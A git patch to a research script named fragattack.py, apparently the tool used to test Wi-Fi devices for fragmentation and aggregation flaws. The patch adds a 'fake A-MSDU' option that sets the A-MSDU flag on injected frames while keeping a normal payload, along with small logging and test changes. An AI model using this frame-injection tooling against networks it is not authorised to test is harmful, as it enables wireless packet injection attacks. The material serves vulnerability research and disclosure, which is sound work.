From 5b526124bcc19a5170debccac073cfbe9a16338f Mon Sep 17 00:00:00 2001 From: Mathy Date: Thu, 23 Apr 2020 21:15:15 -0400 Subject: [PATCH] fragattack: option to send a fake A-MSDU --- research/fragattack.py | 28 ++++++++++++++++++++++++---- 1 file changed, 24 insertions(+), 4 deletions(-) diff --git a/research/fragattack.py b/research/fragattack.py index 851962d75..25450dc58 100755 --- a/research/fragattack.py +++ b/research/fragattack.py @@ -247,11 +247,14 @@ class PingTest(Test): # Generate the header and payload header, request, self.check_fn = generate_request(station, self.ptype) - if self.as_msdu: + if self.as_msdu == 1: # Set the A-MSDU frame type flag in the QoS header header.Reserved = 1 # Encapsulate the request in an A-MSDU payload request = add_msdu_frag(station.mac, station.get_peermac(), request) + elif self.as_msdu == 2: + # Set A-MSDU flag but include a normal payload (fake A-MSDU) + header.Reserved = 1 # Generate all the individual (fragmented) frames num_frags = len(self.get_actions(Action.Inject)) @@ -281,6 +284,7 @@ class PingTest(Test): class LinuxTest(Test): def __init__(self, ptype): super().__init__([ + Action(Action.Connected, Action.GetIp), # XXX we don't always want to wait on this? Action(Action.Connected, enc=True), Action(Action.Connected, enc=True), Action(Action.Connected, enc=False) @@ -529,7 +533,9 @@ class Station(): return header def encrypt(self, frame, inc_pn=1, force_key=None): + # TODO: Option to use per-QoS transmit replay counters? self.pn += inc_pn + key, keyid = (self.tk, 0) if int(frame.addr1[1], 16) & 1 == 0 else (self.gtk, self.gtk_idx) if force_key == 0: log(STATUS, "Encrypting with all-zero key") @@ -642,7 +648,7 @@ class Station(): if act.encrypted: assert self.tk != None and self.gtk != None - log(STATUS, "Encrypting with key " + self.tk.hex() + " " + repr(frame)) + log(STATUS, "Encrypting with key " + self.tk.hex() + " " + repr(act.frame)) frame = self.encrypt(act.frame, inc_pn=act.inc_pn, force_key=act.key) else: frame = act.frame @@ -1170,7 +1176,7 @@ def stract2action(stract): raise Exception("Unrecognized action") -def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=False, ptype=None): +def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype=None): if test_name == "ping": if stractions != None: actions = [stract2action(stract) for stract in stractions.split(",")] @@ -1288,6 +1294,18 @@ def args2ptype(args): return None +def args2msdu(args): + # Only one of these should be given + if args.msdu + args.fake_msdu > 1: + log(STATUS, "You cannot combine --msdu and --fake_msdu. Please only supply one of them.") + quit(1) + + if args.msdu: return 1 + if args.fake_msdu: return 2 + + return None + + if __name__ == "__main__": log(WARNING, "Remember to use a modified backports and ath9k_htc firmware!\n") @@ -1302,6 +1320,7 @@ if __name__ == "__main__": parser.add_argument('--delay', type=float, default=0, help="Delay between fragments in certain tests.") parser.add_argument('--inc-pn', type=int, help="To test non-sequential packet number in fragments.") parser.add_argument('--msdu', default=False, action='store_true', help="Encapsulate pings in an A-MSDU frame.") + parser.add_argument('--fake-msdu', default=False, action='store_true', help="Set A-MSDU flag but include normal payload.") parser.add_argument('--arp', default=False, action='store_true', help="Override default request with ARP request.") parser.add_argument('--dhcp', default=False, action='store_true', help="Override default request with DHCP discover.") parser.add_argument('--icmp', default=False, action='store_true', help="Override default request with ICMP ping request.") @@ -1309,11 +1328,12 @@ if __name__ == "__main__": args = parser.parse_args() ptype = args2ptype(args) + as_msdu = args2msdu(args) # Convert parsed options to TestOptions object options = TestOptions() options.interface = args.iface - options.test = prepare_tests(args.testname, args.actions, args.delay, args.inc_pn, args.msdu, ptype) + options.test = prepare_tests(args.testname, args.actions, args.delay, args.inc_pn, as_msdu, ptype) options.ip = args.ip options.peerip = args.peerip options.rekey_request = args.rekey_request